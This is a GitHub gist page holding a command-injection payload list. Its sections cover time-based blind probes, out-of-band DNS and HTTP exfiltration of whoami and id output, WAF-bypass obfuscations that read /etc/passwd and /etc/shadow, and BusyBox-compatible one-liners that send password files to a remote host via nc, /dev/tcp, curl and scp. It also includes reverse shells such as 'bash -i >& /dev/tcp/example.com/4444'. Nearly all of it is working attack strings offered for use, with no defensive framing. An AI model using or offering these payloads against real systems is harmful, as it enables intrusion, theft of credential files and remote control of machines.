Skip to content

Instantly share code, notes, and snippets.

@win3zz
Created May 30, 2026 13:01
Show Gist options
  • Select an option

  • Save win3zz/31b53a9999f444fb76a4380d8622ec64 to your computer and use it in GitHub Desktop.

Select an option

Save win3zz/31b53a9999f444fb76a4380d8622ec64 to your computer and use it in GitHub Desktop.
command-injection, RCE, OOB exfiltration, WAF-bypass - payload lists
Useful for Shell scripts, BusyBox applets, ELF binaries, CGI binaries, Init scripts, IPC handlers, Configuration parsers etc
---
# --- TIME-BASED BLIND DETECTION ---
;sleep 10;
|sleep 10|
&sleep 10&
\nsleep 10\n
`sleep 10`
$(sleep 10)
;sleep${IFS}10;
;busybox${IFS}sleep${IFS}10;
;X=sleep;Y=10;$X$IFS$Y;
;echo${IFS}c2xlZXAgMTA=|base64${IFS}-d|sh;
;printf${IFS}'\x73\x6c\x65\x65\x70\x20\x31\x30'|sh;
;timeout 10 sh -c 'sleep 10';
;perl -e 'sleep 10';
;python -c "import time;time.sleep(10)";
;php -r "sleep(10);";
;awk 'BEGIN{system("sleep 10")}';
;sh -c "sleep 10";
;bash -c "sleep 10";
;$(sleep${IFS}10)
;`sleep${IFS}10`
;{sleep,10}
;exec sleep 10
;true|sleep 10
;false;sleep 10
# --- OUT-OF-BAND (OOB) DNS / HTTP DETECTION ---
;ping -c 4 $(whoami).example.com;
|ping -c 4 `whoami`.example.com|
&ping -c 4 $(uname -m).example.com&
$(nslookup $(whoami).example.com)
`nslookup \`uname -a\`.example.com`
;wget http://example.com/$(whoami);
|wget http://example.com/`id`|
;curl http://example.com/$(whoami);
|curl http://example.com/`id`|
;curl http://example.com/?d=$(id|base64);
;wget --post-data=$(id|base64) http://example.com/;
;curl -A $(whoami) http://example.com/
;wget --header="X-Data: $(id)" http://example.com/
;curl -d "data=$(uname -a)" http://example.com/
;wget --header="User-Agent: $(whoami)" http://example.com/
;ftp example.com <<< $(id)
;nc example.com 1234 <<< $(uname -a)
;echo $(id)|nc example.com 80
;echo $(whoami)|telnet example.com 80
;curl http://example.com/$(id|tr -d ' ')
;wget http://example.com/$(id|tr -d ' ')
# --- WAF BYPASS / SPACE OBFUSCATION VARIANTS ---
;cat$IFS/etc/passwd;
;cat${IFS}/etc/passwd;
;cat$IFS$9/etc/passwd;
;{cat,/etc/passwd};
X=$'\x20';cat$X/etc/passwd;
X=cat;Y=/etc/passwd;$X$IFS$Y;
;cat</etc/passwd;
;cat$IFS/etc/shadow;
;cat<<<"/etc/passwd";
;cat$IFS</etc/passwd;
;cat</etc/shadow;
;{cat,/etc/shadow};
;IFS=,;cat,/etc/passwd
;cat$IFS$1/etc/passwd
;cat$IFS$2/etc/passwd
;cat$IFS$PATH/etc/passwd
# --- WAF BYPASS / CHARACTER OBFUSCATION VARIANTS ---
;c\a\t /e\t\c/p\a\s\s\w\d;
;c'a't /e't'c/p'a's's'w'd;
;c"a"t /e"t"c/p"a"s"s"w"d;
;cat /et*/*passwd;
;cat /et?/pas??w;
;echo$IFS'Y2F0IC9ldGMvcGFzc3dk'$IFS|$IFS'base64'$IFS'-d'|$IFS'sh';
;printf$IFS'\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'|sh;
;c\at /etc/p\asswd
;c@t /etc/p@sswd
;c%at /etc/p%asswd
;c^at /etc/p^asswd
;c*at /etc/p*asswd
;ca\t /etc/pas\swd
;ca\t /etc/pas$IFS$swd
;echo$IFS'Y2F0IC9ldGMvc2hhZG93'|base64 -d|sh
;perl -e 'print "cat /etc/passwd\n"'|sh
;python -c "print('cat /etc/passwd')"|sh
# --- OUT-OF-BAND VIA BUILT-IN NETWORK UTILITIES (BUSYBOX COMPATIBLE) ---
;host $(whoami).example.com;
;dig $(whoami).example.com;
;telnet example.com 80 </etc/passwd;
;cat /etc/passwd > /dev/tcp/example.com/80;
;nc example.com 80 < /etc/passwd;
;nc -e /bin/sh example.com 4444
;exec 5<>/dev/tcp/example.com/80;cat /etc/passwd >&5
;bash -i >& /dev/tcp/example.com/4444 0>&1
;telnet example.com 1234 <<< $(whoami)
;ftp -n example.com <<< "quote USER $(id)"
;curl -T /etc/passwd http://example.com/
;wget --method=PUT --body-file=/etc/passwd http://example.com/
;scp /etc/passwd user@example.com:/tmp/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment